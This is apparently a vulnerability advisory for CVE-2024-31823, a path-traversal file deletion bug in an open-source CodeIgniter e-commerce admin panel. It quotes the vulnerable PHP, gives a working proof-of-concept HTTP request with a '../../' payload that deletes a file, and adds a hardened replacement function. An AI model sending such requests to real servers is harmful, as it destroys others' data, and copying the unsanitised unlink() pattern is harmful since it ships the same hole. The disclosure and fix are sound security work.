
@LioTree
Created April 28, 2024 12:35
CVE-2024-31823

vendor: kirilkirkov/Ecommerce-CodeIgniter-Bootstrap (github.com)

version: versions before commit d22b54e ("Vulnerability fixes from Lion Tree", kirilkirkov/Ecommerce-CodeIgniter-Bootstrap on github.com)

An arbitrary file deletion (CWE-73) vulnerability exists in `application/modules/admin/controllers/ecommerce/Publish.php`. In the method `removeSecondaryImage`, `$_POST['folder']` and `$_POST['image']` are concatenated into the path handed to `unlink()` without any sanitization, so an authorized user who controls these two parameters can delete any file on the server.

```php
public function removeSecondaryImage()
{
    if ($this->input->is_ajax_request()) {
        // $_POST['folder'] and $_POST['image'] are used as-is, so "../"
        // sequences walk out of ./attachments/shop_images before unlink().
        $img = '.' . DIRECTORY_SEPARATOR . 'attachments' . DIRECTORY_SEPARATOR . 'shop_images' . DIRECTORY_SEPARATOR . '' . $_POST['folder'] . DIRECTORY_SEPARATOR . $_POST['image'];
        unlink($img);
    }
}
```
Proof-of-concept request (the body traverses two directories up from `shop_images` and targets `README.md`):

```http
POST /Ecommerce-CodeIgniter-Bootstrap/admin/removeSecondaryImage HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 31
Origin: http://localhost
Connection: close
Referer: http://localhost/Ecommerce-CodeIgniter-Bootstrap/admin/publish
Cookie: ci_session=8qfeq95l0u1nfjpj6clgr5p976m7igkh; shopping_cart=a%3A1%3A%7Bi%3A0%3Bi%3A2%3B%7D
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

image=README.md&folder=../../
```
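A path-confining replacement for the delete logic, added here as an example (it is not the project's code and not the fix in commit d22b54e): each parameter is restricted to a single path segment and the resolved target is checked against the resolved image root before `unlink()`. The `$baseDir` parameter and the temporary fixture are assumptions so the check can be exercised from the CLI.

```php
<?php
// Added example (not the project's code nor the fix in commit d22b54e):
// confine the delete target to the shop_images tree before calling unlink().
// $baseDir is a hypothetical parameter so the check can run from the CLI.

/** Resolved path to delete, or null if the request escapes the image root
 *  or does not name an existing regular file. */
function resolveSecondaryImagePath(string $baseDir, string $folder, string $image): ?string
{
    // Each parameter must be one path segment: no separators, no "." or "..".
    if (!preg_match('/^[A-Za-z0-9_-]+$/', $folder)) {
        return null;
    }
    if (!preg_match('/^[A-Za-z0-9_-]+\.[A-Za-z0-9]+$/', $image)) { // e.g. photo.jpg
        return null;
    }
    $root = realpath($baseDir);
    if ($root === false) {
        return null;
    }
    // realpath() resolves "..", "." and symlinks; a missing target yields false.
    $candidate = realpath($root . DIRECTORY_SEPARATOR . $folder . DIRECTORY_SEPARATOR . $image);
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Second line of defence: the resolved path must still sit under the resolved root.
    if (strpos($candidate, $root . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// In the controller (CodeIgniter 3 style, mirroring the original method):
//   $target = resolveSecondaryImagePath('./attachments/shop_images',
//       (string) $this->input->post('folder'), (string) $this->input->post('image'));
//   if ($target !== null) { unlink($target); }

// Demo with a constructed fixture: one folder/image under a temporary root and
// a README.md one level above it, the file the PoC body points at.
$tmp = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'cve_2024_31823_' . bin2hex(random_bytes(4));
mkdir($tmp . '/shop_images/42', 0700, true);
file_put_contents($tmp . '/shop_images/42/photo.jpg', 'jpeg bytes');
file_put_contents($tmp . '/README.md', 'must survive');
$root = $tmp . '/shop_images';
var_dump(resolveSecondaryImagePath($root, '42', 'photo.jpg'));        // string: resolved path
var_dump(resolveSecondaryImagePath($root, '../../', 'README.md'));    // NULL (PoC body rejected)
var_dump(resolveSecondaryImagePath($root, '42', '../../README.md'));  // NULL
```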